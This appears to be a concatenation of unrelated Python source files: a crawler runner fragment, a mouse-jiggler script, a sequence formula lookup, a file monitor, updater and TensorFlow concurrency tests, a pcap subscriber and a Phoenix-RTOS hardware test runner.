influxdb_type = "memory_stats"
influxdb_measurement_name = "server_ram_free"
def save_mem_stats(self):
v = psutil.virtual_memory()
params = {
'mem_total' : v.total,
'mem_available' : v.available,
'mem_percent' : v.percent,
'mem_used' : v.used,
'mem_free' : v.free,
'mem_active' : v.active,
'mem_inactive' : v.inactive,
'mem_buffers' : v.buffers,
'mem_cached' : v.cached,
'mem_shared' : v.shared,
'mem_slab' : v.slab,
}
self.log.info("Memory stats: %s", params)
points = [
{
'measurement' : self.influxdb_measurement_name,
"tags": {
'type' : self.influxdb_type,
},
'time' : int(time.time() * 1e9),
'fields' : params
}
]
self.influx_client.write_points(points)
def go(args):
largv = [tmp.lower() for tmp in args]
common.redis.config_redis()
rules = WebMirror.rules.load_rules()
lowrate = "lowrate" in largv
runner = common.RunManager.Crawler(
main_thread_count = NO_PROCESSES,
raw_thread_count = RAW_NO_PROCESSES,
lowrate = lowrate,
)
if "raw" in largv:
common.process.name_process("raw fetcher management thread")
print("RAW Scrape!")
RawArchiver.RawUrlUpserter.check_init_func()
if not "noreset" in largv:
print("Resetting any in-progress downloads.")
RawArchiver.RawUrlUpserter.resetRawInProgress()
else:
print("Not resetting in-progress downloads.")
RawArchiver.RawUrlUpserter.initializeRawStartUrls()
runner.run_raw()
else:
common.process.name_process("fetcher management thread")
if "noreset" not in largv and not lowrate:
print("Resetting any in-progress downloads.")
WebMirror.UrlUpserter.resetInProgress()
WebMirror.UrlUpserter.resetRedisQueues()
else:
print("Not resetting in-progress downloads.")
#if not "noreset" in largv:
# print("Dropping fetch priority levels.")
# common.management.WebMirrorManage.exposed_drop_priorities()
#else:
# print("Not resetting fetch priority levels.")
WebMirror.UrlUpserter.initializeStartUrls(rules)
runner.run()
print("Main runner returned!")
# print("Thread halted. App exiting.")
def dump_active_items():
print("Dumping active URLs")
active = {
'fetching' : [tmp.decode("utf-8") for tmp in common.redis.get_fetching_urls()],
'processing' : [tmp.decode("utf-8") for tmp in common.redis.get_processing_urls()],
}
with open("active_jobs_at_start_%s.json" % time.time(), "w") as fp:
json.dump(active, fp, sort_keys=True, indent=4)
common.redis.clear_fetching_urls()
common.redis.clear_processing_urls()
def run_in_subprocess():
if 'raw' not in sys.argv:
dump_active_items()
# mon = MemoryTracker()
proc = multiprocessing.Process(target=go, args=(sys.argv, ))
proc.start()
while proc.is_alive():
time.sleep(4)
# mon.save_mem_stats()
# print("Base Subprocessor Runner: %s, %s" % (proc.is_alive(), proc.pid))
print("Main runner has gone away. Committing Suicide")
# If the subprocess has gone away, die hard.
import ctypes
ctypes.string_at(1)
import os
os.kill(0,4)
if __name__ == "__main__":
import sys
largv = [tmp.lower() for tmp in sys.argv]
if "scheduler" in sys.argv:
print("Please use runScheduler.py instead!")
sys.exit(1)
else:
started = False
if not started:
started = True
run_in_subprocess()
|
MouseJiggle.py | import os, sys
import ctypes
import time
import multiprocessing
# # see http://msdn.microsoft.com/en-us/library/ms646260(VS.85).aspx for details
# ctypes.windll.user32.SetCursorPos(100, 20)
# ctypes.windll.user32.mouse_event(2, 0, 0, 0,0) # left down
# ctypes.windll.user32.mouse_event(4, 0, 0, 0,0) # left up
# Value Meaning
# MOUSEEVENTF_ABSOLUTE
# 0x8000
# The dx and dy parameters contain normalized absolute coordinates. If not set, those parameters contain relative data: the change in position since the last reported position. This flag can be set, or not set, regardless of what kind of mouse or mouse-like device, if any, is connected to the system. For further information about relative mouse motion, see the following Remarks section.
# MOUSEEVENTF_LEFTDOWN
# 0x0002
# The left button is down.
# MOUSEEVENTF_LEFTUP
# 0x0004
# The left button is up.
# MOUSEEVENTF_MIDDLEDOWN
# 0x0020
# The middle button is down.
# MOUSEEVENTF_MIDDLEUP
# 0x0040
# The middle button is up.
# MOUSEEVENTF_MOVE
# 0x0001
# Movement occurred.
# MOUSEEVENTF_RIGHTDOWN
# 0x0008
# The right button is down.
# MOUSEEVENTF_RIGHTUP
# 0x0010
# The right button is up.
# MOUSEEVENTF_WHEEL
# 0x0800
# The wheel has been moved, if the mouse has a wheel. The amount of movement is specified in dwData
# MOUSEEVENTF_XDOWN
# 0x0080
# An X button was pressed.
# MOUSEEVENTF_XUP
# 0x0100
# An X button was released.
# MOUSEEVENTF_WHEEL
# 0x0800
# The wheel button is rotated.
# MOUSEEVENTF_HWHEEL
# 0x01000
# The wheel button is tilted.
MOUSEEVENTF_MOVE = 0x0001 # mouse move
MOUSEEVENTF_LEFTDOWN = 0x0002 # left button down
MOUSEEVENTF_LEFTUP = 0x0004 # left button up
MOUSEEVENTF_RIGHTDOWN = 0x0008 # right button down
MOUSEEVENTF_RIGHTUP = 0x0010 # right button up
MOUSEEVENTF_MIDDLEDOWN = 0x0020 # middle button down
MOUSEEVENTF_MIDDLEUP = 0x0040 # middle button up
MOUSEEVENTF_WHEEL = 0x0800 # wheel button rolled
MOUSEEVENTF_ABSOLUTE = 0x8000 # absolute move
SM_CXSCREEN = 0
SM_CYSCREEN = 1
class POINT(ctypes.Structure):
_fields_ = [("x", ctypes.c_long), ("y", ctypes.c_long)]
def MouseListener():
pos = POINT()
ctypes.windll.user32.GetCursorPos(ctypes.byref(pos))
x = pos.x
y = pos.y
while True:
time.sleep(10/1000)
ctypes.windll.user32.GetCursorPos(ctypes.byref(pos))
if x != pos.x or y != pos.y:
x, y = pos.x, pos.y
print(x,' , ', y)
pass
def main():
# p = multiprocessing.Process(target=MouseListener)
# p.start()
dx = 5
dy = -5
while True:
dx *= -1
dy *= -1
ctypes.windll.user32.mouse_event(MOUSEEVENTF_MOVE, dx, dy, 0, 0)
time.sleep(2)
# ctypes.windll.user32.keybd_event(0x31, 0, 0, 0) # Key Down
# ctypes.windll.user32.keybd_event(0x31, 0, 0x0002, 0) # Key Up
# p.join()
pass
if __name__ == "__main__":
main()
pass |
formula_lookup.py | import time
import search_engine.utils as utils
import multiprocessing
from search_engine import seq_list_numeric
from search_engine import seq_list
from .math_exp_eval_engine import NumericStringParser
"""
This file contains the implementations for formula lookup algorithm
"""
return_dic: dict
progress: multiprocessing.Value
lock: multiprocessing.Manager().Lock
_NUMBER_OF_THREADS = 8
def is_expression_correct(exp_input: str):
"""
A function to validate the syntax of the input that represents the terms formula lookup
exp_input: The terms lookup formula.
returns: True if the syntax is valid, False otherwise.
"""
try:
nsp = NumericStringParser()
# Parse terms and trim spaces
exp_input = exp_input.lower().split(',')
exp_input = list(map(lambda term_of_sequence: str(term_of_sequence).strip(), exp_input))
# Calculate and Compare
        # Evaluate every term with n = 1000; any parsing error means the syntax is invalid
        for i in range(len(exp_input)):
            term = exp_input[i].replace('n', '1000')
            nsp.eval(term)
        return True
    except Exception:
        return False
def formula_lookup_terms_by_terms(nsp: NumericStringParser, exp_input: list, sequence: list, n_index: int):
"""
    Check whether a candidate window of a sequence matches the terms lookup formula (e.g. n - 10, n, n * 10, n * 20).
    nsp: Instance of NumericStringParser
    exp_input: The terms lookup formula.
    sequence: A window that must contain the same number of terms as the terms lookup formula.
    n_index: The index of the term that represents n.
    returns: True if matched, False otherwise.
"""
n = sequence[n_index]
# Calculate and Compare
for i in range(len(exp_input)):
term = exp_input[i].replace('n', str(n))
if nsp.eval(term) != sequence[i]:
return False
return True
def parse_expression(exp_input: str):
exp_input = exp_input.lower().split(',')
exp_input = list(map(lambda x: str(x).strip(), exp_input))
return exp_input
def get_index_of_term_n(exp_input: list):
for i in range(len(exp_input)):
if exp_input[i] == 'n':
return i
def formula_lookup_linear_search(exp_input: str, range_list):
"""
    Search the sequence database for matches of a terms lookup formula (e.g. n - 10, n, n * 10, n * 20).
    exp_input: The terms lookup formula.
    range_list: The indices of seq_list_numeric that this worker should scan.
    returns: A dictionary where the key represents the sequence and the value represents the terms index where the
    formula has matched.
"""
# Parse terms and trim spaces
global progress
global return_dic
global lock
if not ('lock' in vars() or 'lock' in globals()):
        # Make it work without a direct call from formula_lookup
lock = multiprocessing.Manager().Lock()
progress = multiprocessing.Value('i', 0)
return_dic = multiprocessing.Manager().dict()
exp_input = parse_expression(exp_input)
n_index = get_index_of_term_n(exp_input)
number_of_terms = len(exp_input)
nsp = NumericStringParser()
# Iterate over sequences
for i in range_list:
seq = list(seq_list_numeric[i])
with lock:
progress.value += 1
# Iterate over terms one by one
        for d in range(len(seq) - number_of_terms + 1):  # include the final window
seq_cut = seq[d:(d + number_of_terms)]
if formula_lookup_terms_by_terms(nsp, exp_input, seq_cut, n_index):
return_dic[seq_list[i]] = d
break
return return_dic
def range_split(range_to_split, number_of_groups):
k, m = divmod(len(range_to_split), number_of_groups)
return (range_to_split[i * k + min(i, m):(i + 1) * k + min(i + 1, m)] for i in range(number_of_groups))
def formula_lookup(exp_input: str):
"""
    Search all sequences for matches of a terms lookup formula (e.g. n - 10, n, n * 10, n * 20).
exp_input: The terms lookup formula.
returns: A dictionary where the key represents the sequence and the value represents terms index where the
formula has matched.
"""
global return_dic
global progress
global lock
lock = multiprocessing.Manager().Lock()
progress = multiprocessing.Value('i', 0)
return_dic = multiprocessing.Manager().dict()
if not is_expression_correct(exp_input):
raise ValueError("The expression syntax is wrong!")
# Divide Range
process_list = []
number_of_sequences = len(seq_list_numeric)
indices_range = list(range_split(range(number_of_sequences), _NUMBER_OF_THREADS))
# Start Processes
for i in range(_NUMBER_OF_THREADS):
proc = multiprocessing.Process(target=formula_lookup_linear_search, args=(exp_input, indices_range[i]))
proc.start()
process_list.append(proc)
# Wait and Echo
index = 0
while progress.value != number_of_sequences:
utils.waiting_with_index(index, progress.value, number_of_sequences)
index += 1
time.sleep(0.25)
print("")
# Join
for process in process_list:
process.join()
# Return
return return_dic
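# A minimal usage sketch, not part of the original module: the formula string follows the
# example quoted in the docstrings above, and the package's sequence data (seq_list /
# seq_list_numeric) is assumed to have been loaded on import.
if __name__ == '__main__':
    results = formula_lookup('n - 10, n, n * 10, n * 20')
    for sequence, start_index in results.items():
        print(sequence, '-> formula matched starting at term index', start_index)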
|
file_monitor.py |
import threading
import pyinotify
import logging
import atexit
from abc import abstractmethod
from pytos.common.logging.definitions import COMMON_LOGGER_NAME
logger = logging.getLogger(COMMON_LOGGER_NAME)
class ModifiedFileEventHandler(pyinotify.ProcessEvent):
def my_init(self, callback=None):
self._callback = callback
def process_IN_CLOSE_WRITE(self, event):
self._callback()
def process_IN_MODIFY(self, event):
self._callback()
class FileMonitor:
FILE_CHANGE_MASK = pyinotify.IN_CLOSE_WRITE | pyinotify.IN_MODIFY
def __init__(self, file_paths, watch_mask=FILE_CHANGE_MASK):
self.inotify_watch_manager = pyinotify.WatchManager()
self._file_paths = file_paths
self._event_handler = ModifiedFileEventHandler(callback=self._reload_modified_file)
self._inotify_notifier = pyinotify.Notifier(self.inotify_watch_manager, default_proc_fun=self._event_handler)
self._loop_thread = threading.Thread(target=self._inotify_notifier.loop, daemon=True)
for file_path in self._file_paths:
self.inotify_watch_manager.add_watch(file_path, watch_mask)
self._loop_thread.start()
atexit.register(self._shutdown)
def _shutdown(self):
for watch in self.inotify_watch_manager.watches.copy():
self.inotify_watch_manager.del_watch(watch)
self._inotify_notifier.stop()
self._loop_thread.join(0.1)
def __del__(self):
self._shutdown()
@abstractmethod
def _reload_modified_file(self, *args, **kwargs):
raise NotImplementedError
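# A minimal subclass sketch, not part of the original module (the watched path is an
# illustrative assumption): FileMonitor is abstract, so users override
# _reload_modified_file to react when one of the watched files changes.
class ReloadingConfigMonitor(FileMonitor):
    def __init__(self, config_path):
        self._config_path = config_path
        self.contents = None
        super().__init__([config_path])

    def _reload_modified_file(self, *args, **kwargs):
        with open(self._config_path) as config_file:
            self.contents = config_file.read()
        logger.debug("Reloaded contents of %s", self._config_path)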
|
test_neos_updater.py | #!/usr/bin/env python3
import hashlib
import http.server
import json
import os
import unittest
import random
import requests
import shutil
import socketserver
import tempfile
import multiprocessing
from pathlib import Path
from selfdrive.hardware.eon.neos import RECOVERY_DEV, NEOSUPDATE_DIR, get_fn, download_file, \
verify_update_ready, download_neos_update
EON_DIR = os.path.join(os.path.dirname(os.path.abspath(__file__)))
MANIFEST = os.path.join(EON_DIR, "neos.json")
PORT = 8000
def server_thread(port):
socketserver.TCPServer.allow_reuse_address = True
httpd = socketserver.TCPServer(("", port), http.server.SimpleHTTPRequestHandler)
httpd.serve_forever()
class TestNeosUpdater(unittest.TestCase):
@classmethod
def setUpClass(cls):
# generate a fake manifest
cls.manifest = {}
for i in ('ota', 'recovery'):
with tempfile.NamedTemporaryFile(delete=False, dir=os.getcwd()) as f:
dat = os.urandom(random.randint(1000, 100000))
f.write(dat)
cls.manifest[f"{i}_url"] = f"http://localhost:{PORT}/" + os.path.relpath(f.name)
cls.manifest[F"{i}_hash"] = hashlib.sha256(dat).hexdigest()
if i == "recovery":
cls.manifest["recovery_len"] = len(dat)
with tempfile.NamedTemporaryFile(delete=False, mode='w') as f:
f.write(json.dumps(cls.manifest))
cls.fake_manifest = f.name
@classmethod
def tearDownClass(cls):
os.unlink(cls.fake_manifest)
os.unlink(os.path.basename(cls.manifest['ota_url']))
os.unlink(os.path.basename(cls.manifest['recovery_url']))
def setUp(self):
# server for update files
self.server = multiprocessing.Process(target=server_thread, args=(PORT, ))
self.server.start()
# clean up
if os.path.exists(NEOSUPDATE_DIR):
shutil.rmtree(NEOSUPDATE_DIR)
def tearDown(self):
self.server.kill()
self.server.join(1)
def _corrupt_recovery(self):
with open(RECOVERY_DEV, "wb") as f:
f.write(b'\x00'*100)
def test_manifest(self):
with open(MANIFEST) as f:
m = json.load(f)
assert m['ota_hash'] in m['ota_url']
assert m['recovery_hash'] in m['recovery_url']
assert m['recovery_len'] > 0
for url in (m['ota_url'], m['recovery_url']):
      r = requests.head(url)
r.raise_for_status()
self.assertEqual(r.headers['Content-Type'], "application/octet-stream")
if url == m['recovery_url']:
self.assertEqual(int(r.headers['Content-Length']), m['recovery_len'])
def test_download_hash_check(self):
os.makedirs(NEOSUPDATE_DIR, exist_ok=True)
Path(get_fn(self.manifest['ota_url'])).touch()
with self.assertRaisesRegex(Exception, "failed hash check"):
download_file(self.manifest['ota_url'], get_fn(self.manifest['ota_url']),
self.manifest['ota_hash']+'a', "system")
# should've unlinked after the failed hash check, should succeed now
download_file(self.manifest['ota_url'], get_fn(self.manifest['ota_url']),
self.manifest['ota_hash'], "system")
# TODO: needs an http server that supports Content-Range
#def test_download_resume(self):
# os.makedirs(NEOSUPDATE_DIR, exist_ok=True)
# with open(os.path.basename(self.manifest['ota_url']), "rb") as src, \
# open(get_fn(self.manifest['ota_url']), "wb") as dest:
# l = dest.write(src.read(8192))
# assert l == 8192
# download_file(self.manifest['ota_url'], get_fn(self.manifest['ota_url']),
# self.manifest['ota_hash'], "system")
def test_download_no_internet(self):
self.server.kill()
os.makedirs(NEOSUPDATE_DIR, exist_ok=True)
# fail, no internet
with self.assertRaises(requests.exceptions.ConnectionError):
download_file(self.manifest['ota_url'], get_fn(self.manifest['ota_url']),
self.manifest['ota_hash'], "system")
# already cached, ensure we don't hit the server
shutil.copyfile(os.path.basename(self.manifest['ota_url']), get_fn(self.manifest['ota_url']))
download_file(self.manifest['ota_url'], get_fn(self.manifest['ota_url']),
self.manifest['ota_hash'], "system")
def test_download_update(self):
download_neos_update(self.fake_manifest)
self.assertTrue(verify_update_ready(self.fake_manifest))
def test_verify_update(self):
# good state
download_neos_update(self.fake_manifest)
self.assertTrue(verify_update_ready(self.fake_manifest))
# corrupt recovery
self._corrupt_recovery()
self.assertFalse(verify_update_ready(self.fake_manifest))
# back to good state
download_neos_update(self.fake_manifest)
self.assertTrue(verify_update_ready(self.fake_manifest))
# corrupt ota
self._corrupt_recovery()
with open(os.path.join(NEOSUPDATE_DIR, os.path.basename(self.manifest['ota_url'])), "ab") as f:
f.write(b'\x00')
self.assertFalse(verify_update_ready(self.fake_manifest))
if __name__ == "__main__":
unittest.main()
|
pcap_subscriber.py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import asyncio
import socket
import threading
from fboss.thrift_clients import PcapPushSubClient
from neteng.fboss.asyncio.pcap_pubsub import PcapSubscriber as ThriftSub
from thrift.server import TAsyncioServer
class PcapSubscriber(ThriftSub.Iface):
def __init__(self, port):
self.hostname = socket.gethostname()
self.port = port
def subscribe(self, pub_hostname):
# setup client
self._client = PcapPushSubClient(pub_hostname)
self._client.subscribe(self.hostname, self.port)
def unsubscribe(self):
self._client.unsubscribe(self.hostname, self.port)
# inherit this class and override the on receive functions
# additionally, these functions need to be thread-safe
class PcapListener():
def __init__(self, sub):
self.subscriber = sub
def thread_work(self):
self.loop = asyncio.new_event_loop()
self.server = self.loop.run_until_complete(
TAsyncioServer.ThriftAsyncServerFactory(
self.subscriber, port=self.subscriber.port, loop=self.loop
)
)
self.subscriber.subscribe(self.remote)
self.loop.run_forever()
def open_connection(self, remote_host):
self.remote = remote_host
self.server_thread = threading.Thread(target=self.thread_work, args=())
self.server_thread.daemon = True
self.server_thread.start()
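# A minimal usage sketch, not part of the original module: the switch hostname and local
# thrift port are illustrative assumptions. A real consumer would subclass PcapSubscriber
# (which implements the generated ThriftSub.Iface) and override its packet-receive
# callbacks; their exact names come from the pcap_pubsub thrift definition, and they must
# be thread-safe, per the note above.
if __name__ == "__main__":
    import time

    listener = PcapListener(PcapSubscriber(port=5911))
    listener.open_connection("fboss-switch.example.com")
    try:
        time.sleep(60)  # keep the daemon server thread alive while packets stream in
    finally:
        listener.subscriber.unsubscribe()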
|
common.py | #
# Phoenix-RTOS test runner
#
# Common parts of phoenix-rtos test runners
#
# Copyright 2021 Phoenix Systems
# Authors: Jakub Sarzyński, Mateusz Niewiadomski, Damian Loewnau
#
import importlib
import logging
import os
import signal
import sys
import threading
import time
from abc import ABC, abstractmethod
from pathlib import Path
import subprocess
import pexpect
import pexpect.fdpexpect
import serial
from trunner.config import PHRTOS_PROJECT_DIR
from trunner.tools.color import Color
_BOOT_DIR = PHRTOS_PROJECT_DIR / '_boot'
def rootfs(target: str) -> Path:
return PHRTOS_PROJECT_DIR / '_fs' / target / 'root'
def is_github_actions():
return os.getenv('GITHUB_ACTIONS', False)
def wait_for_dev(port, timeout=0):
asleep = 0
# naive wait for dev
while not os.path.exists(port):
time.sleep(0.01)
asleep += 0.01
if timeout and asleep >= timeout:
raise TimeoutError
def power_usb_ports(enable: bool):
uhubctl = subprocess.run([
'uhubctl',
'-l', '2',
'-a', f'{1 if enable else 0}'],
stdout=subprocess.DEVNULL
)
if uhubctl.returncode != 0:
logging.error('uhubctl failed!\n')
raise Exception('RPi usb ports powering up/down failed!')
def unbind_rpi_usb(port_address):
try:
with open('/sys/bus/usb/drivers/usb/unbind', 'w') as file:
file.write(port_address)
except PermissionError:
logging.error("/sys/bus/usb/drivers/usb/unbind: PermissionError\n\
If You launch test runner locally:\n\
Add 'sudo chmod a+w /sys/bus/usb/drivers/usb/unbind' to /etc/rc.local\n\
If You use Docker:\n\
Set the appropriate permissions\n")
sys.exit(1)
class Psu:
"""Wrapper for psu program"""
def __init__(self, script, cwd=_BOOT_DIR):
self.script = script
self.cwd = cwd
self.proc = None
def read_output(self):
if is_github_actions():
logging.info('::group::Run psu\n')
while True:
line = self.proc.readline()
if not line:
break
logging.info(line)
if is_github_actions():
logging.info('::endgroup::\n')
def run(self):
# Use pexpect.spawn to run a process as PTY, so it will flush on a new line
self.proc = pexpect.spawn(
'psu',
[f'{self.script}'],
cwd=self.cwd,
encoding='utf-8'
)
self.read_output()
self.proc.wait()
if self.proc.exitstatus != 0:
logging.error('psu failed!\n')
raise Exception('Flashing failed!')
def phd_error_msg(message, output):
msg = message
msg += Color.colorify('\nPHOENIXD OUTPUT:\n', Color.BOLD)
msg += output
return msg
class PhoenixdError(Exception):
pass
class Phoenixd:
""" Wrapper for phoenixd program"""
def __init__(
self,
port,
baudrate=460800,
dir='.',
cwd=_BOOT_DIR,
wait_dispatcher=True
):
self.port = port
self.baudrate = baudrate
self.dir = dir
self.cwd = cwd
self.proc = None
self.reader_thread = None
self.wait_dispatcher = wait_dispatcher
self.dispatcher_event = None
self.output_buffer = ''
def _reader(self):
""" This method is intended to be run as a separated thread. It reads output of proc
line by line and saves it in the output_buffer. Additionally, if wait_dispatcher is true,
it searches for a line stating that message dispatcher has started """
while True:
line = self.proc.readline()
if not line:
break
if self.wait_dispatcher and not self.dispatcher_event.is_set():
msg = f'Starting message dispatcher on [{self.port}] (speed={self.baudrate})'
if msg in line:
self.dispatcher_event.set()
self.output_buffer += line
def run(self):
try:
wait_for_dev(self.port, timeout=10)
except TimeoutError as exc:
raise PhoenixdError(f'couldn\'t find {self.port}') from exc
# Use pexpect.spawn to run a process as PTY, so it will flush on a new line
self.proc = pexpect.spawn(
'phoenixd',
['-p', self.port,
'-b', str(self.baudrate),
'-s', self.dir],
cwd=self.cwd,
encoding='utf-8'
)
self.dispatcher_event = threading.Event()
self.reader_thread = threading.Thread(target=self._reader)
self.reader_thread.start()
if self.wait_dispatcher:
# Reader thread will notify us that message dispatcher has just started
dispatcher_ready = self.dispatcher_event.wait(timeout=5)
if not dispatcher_ready:
self.kill()
msg = 'message dispatcher did not start!'
raise PhoenixdError(msg)
return self.proc
def output(self):
output = self.output_buffer
if is_github_actions():
output = '::group::phoenixd output\n' + output + '\n::endgroup::\n'
return output
def kill(self):
if self.proc.isalive():
os.killpg(os.getpgid(self.proc.pid), signal.SIGTERM)
self.reader_thread.join(timeout=10)
if self.proc.isalive():
os.killpg(os.getpgid(self.proc.pid), signal.SIGKILL)
def __enter__(self):
self.run()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.kill()
class PloError(Exception):
def __init__(self, message, expected):
msg = Color.colorify("PLO ERROR:\n", Color.BOLD)
msg += str(message) + '\n'
if expected:
msg += Color.colorify("EXPECTED:\n", Color.BOLD)
msg += str(expected) + '\n'
super().__init__(msg)
class PloTalker:
"""Interface to communicate with plo"""
def __init__(self, port, baudrate=115200):
self.port = port
self.baudrate = baudrate
self.serial = None
self.plo = None
@classmethod
def from_pexpect(cls, pexpect_fd):
""" PloTalker can be created by passing pexpect spawn object directly.
User should handle port and process by himself. """
obj = cls(port=None)
obj.plo = pexpect_fd
return obj
def open(self):
try:
self.serial = serial.Serial(self.port, baudrate=self.baudrate)
except serial.SerialException:
logging.error(f'Port {self.port} not available\n')
raise
try:
self.plo = pexpect.fdpexpect.fdspawn(self.serial, timeout=8)
except Exception:
self.serial.close()
raise
return self
def close(self):
self.serial.close()
def __enter__(self):
return self.open()
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
def wait_prompt(self, timeout=8):
self.plo.expect_exact("(plo)% ", timeout=timeout)
def expect_prompt(self, timeout=8):
idx = self.plo.expect([r"\(plo\)% ", r"(.*?)\n"], timeout=timeout)
if idx == 1:
# Something else than prompt was printed, raise error
line = self.plo.match.group(0)
raise PloError(line, expected="(plo)% ")
def cmd(self, cmd, timeout=8):
self.plo.send(cmd + '\r\n')
        # Wait for the echoed command
self.plo.expect_exact(cmd)
# There might be some ASCII escape characters, we wait only for a new line
self.plo.expect_exact('\n', timeout=timeout)
def app(self, device, file, imap, dmap, exec=False):
exec = '-x' if exec else ''
self.cmd(f'app {device} {exec} {file} {imap} {dmap}', timeout=30)
self.expect_prompt()
def copy(self, src, src_obj, dst, dst_obj, src_size='', dst_size=''):
self.cmd(f'copy {src} {src_obj} {src_size} {dst} {dst_obj} {dst_size}', timeout=60)
self.expect_prompt()
def copy_file2mem(self, src, file, dst='flash1', off=0, size=0):
self.copy(
src=src,
src_obj=file,
dst=dst,
dst_obj=off,
dst_size=size
)
def go(self):
self.plo.send('go!\r\n')
class Runner(ABC):
"""Common interface for test runners"""
BUSY = 'BUSY'
SUCCESS = 'SUCCESS'
FAIL = 'FAIL'
def __init__(self):
# Busy status is set from the start to the end of the specified runner's run
self.status = Runner.BUSY
self.set_status(self.status)
def set_status(self, status):
"""Method for sygnalising a current runner status: busy/failed/succeeded"""
# for now, not used in all target runners
self.status = status
@abstractmethod
def flash(self):
"""Method used for flashing a device with the image containing tests."""
pass
@abstractmethod
def run(self, test):
"""Method used for running a single test case which is represented by TestCase class."""
pass
class DeviceRunner(Runner):
"""This class provides interface to run tests on hardware targets using serial port"""
def __init__(self, serial):
super().__init__()
self.serial_port = serial[0]
self.serial_baudrate = serial[1]
self.serial = None
def run(self, test):
if test.skipped():
return
try:
self.serial = serial.Serial(self.serial_port, baudrate=self.serial_baudrate)
except serial.SerialException:
test.handle_exception()
return
proc = pexpect.fdpexpect.fdspawn(self.serial, encoding='utf-8', timeout=test.timeout)
try:
PloTalker.from_pexpect(proc).go()
test.handle(proc)
finally:
self.serial.close()
class GPIO:
"""Wrapper around the RPi.GPIO module. It represents a single OUT pin"""
def __init__(self, pin, init=0):
self.pin = pin
self.gpio = importlib.import_module('RPi.GPIO')
self.gpio.setmode(self.gpio.BCM)
self.gpio.setwarnings(False)
if init == 0:
self.gpio.setup(self.pin, self.gpio.OUT, initial=self.gpio.LOW)
else:
self.gpio.setup(self.pin, self.gpio.OUT, initial=self.gpio.HIGH)
def high(self):
self.gpio.output(self.pin, self.gpio.HIGH)
def low(self):
self.gpio.output(self.pin, self.gpio.LOW)
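# A minimal flashing sketch, not part of the original runner (the device paths, plo copy
# source and image name are illustrative assumptions): phoenixd serves files over the
# serial link while PloTalker drives the plo bootloader to copy an image into flash and
# boot it.
if __name__ == '__main__':
    with Phoenixd('/dev/serial/by-id/usb-phoenixd-if00', dir='.'):
        with PloTalker('/dev/ttyACM0', baudrate=115200) as plo:
            plo.wait_prompt()
            plo.copy_file2mem(src='usb0', file='phoenix.disk')
            plo.go()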
|
dense_update_ops_no_tsan_test.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for state updating ops that may have benign race conditions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
class AssignOpTest(test.TestCase):
  # NOTE(mrry): We exclude these tests from the TSAN TAP target, because they
# contain benign and deliberate data races when multiple threads update
# the same parameters without a lock.
def testParallelUpdateWithoutLocking(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
ones_t = array_ops.fill([1024, 1024], 1.0)
p = variables.Variable(array_ops.zeros([1024, 1024]))
adds = [
state_ops.assign_add(
p, ones_t, use_locking=False) for _ in range(20)
]
self.evaluate(variables.global_variables_initializer())
def run_add(add_op):
self.evaluate(add_op)
threads = [
self.checkedThread(
target=run_add, args=(add_op,)) for add_op in adds
]
for t in threads:
t.start()
for t in threads:
t.join()
vals = self.evaluate(p)
ones = np.ones((1024, 1024)).astype(np.float32)
self.assertTrue((vals >= ones).all())
self.assertTrue((vals <= ones * 20).all())
def testParallelAssignWithoutLocking(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
ones_t = array_ops.fill([1024, 1024], float(1))
p = variables.Variable(array_ops.zeros([1024, 1024]))
assigns = [
state_ops.assign(p, math_ops.multiply(ones_t, float(i)), False)
for i in range(1, 21)
]
self.evaluate(variables.global_variables_initializer())
def run_assign(assign_op):
self.evaluate(assign_op)
threads = [
self.checkedThread(
target=run_assign, args=(assign_op,)) for assign_op in assigns
]
for t in threads:
t.start()
for t in threads:
t.join()
vals = self.evaluate(p)
# Assert every element is taken from one of the assignments.
self.assertTrue((vals > 0).all())
self.assertTrue((vals <= 20).all())
# NOTE(skyewm): We exclude these tests from the TSAN TAP target, because they
# contain non-benign but known data races between the variable assignment and
# returning the output tensors. This issue will be resolved with the new
# resource variables.
def testParallelUpdateWithLocking(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
zeros_t = array_ops.fill([1024, 1024], 0.0)
ones_t = array_ops.fill([1024, 1024], 1.0)
p = variables.Variable(zeros_t)
adds = [
state_ops.assign_add(
p, ones_t, use_locking=True) for _ in range(20)
]
self.evaluate(p.initializer)
def run_add(add_op):
self.evaluate(add_op)
threads = [
self.checkedThread(
target=run_add, args=(add_op,)) for add_op in adds
]
for t in threads:
t.start()
for t in threads:
t.join()
vals = self.evaluate(p)
ones = np.ones((1024, 1024)).astype(np.float32)
self.assertAllEqual(vals, ones * 20)
def testParallelAssignWithLocking(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
zeros_t = array_ops.fill([1024, 1024], 0.0)
ones_t = array_ops.fill([1024, 1024], 1.0)
p = variables.Variable(zeros_t)
assigns = [
state_ops.assign(
p, math_ops.multiply(ones_t, float(i)), use_locking=True)
for i in range(1, 21)
]
self.evaluate(p.initializer)
def run_assign(assign_op):
self.evaluate(assign_op)
threads = [
self.checkedThread(
target=run_assign, args=(assign_op,)) for assign_op in assigns
]
for t in threads:
t.start()
for t in threads:
t.join()
vals = self.evaluate(p)
# Assert every element is the same, and taken from one of the assignments.
self.assertTrue(vals[0, 0] > 0)
self.assertTrue(vals[0, 0] <= 20)
self.assertAllEqual(vals, np.ones([1024, 1024]) * vals[0, 0])
if __name__ == "__main__":
test.main()
|
practice_01.py | import requests
import json
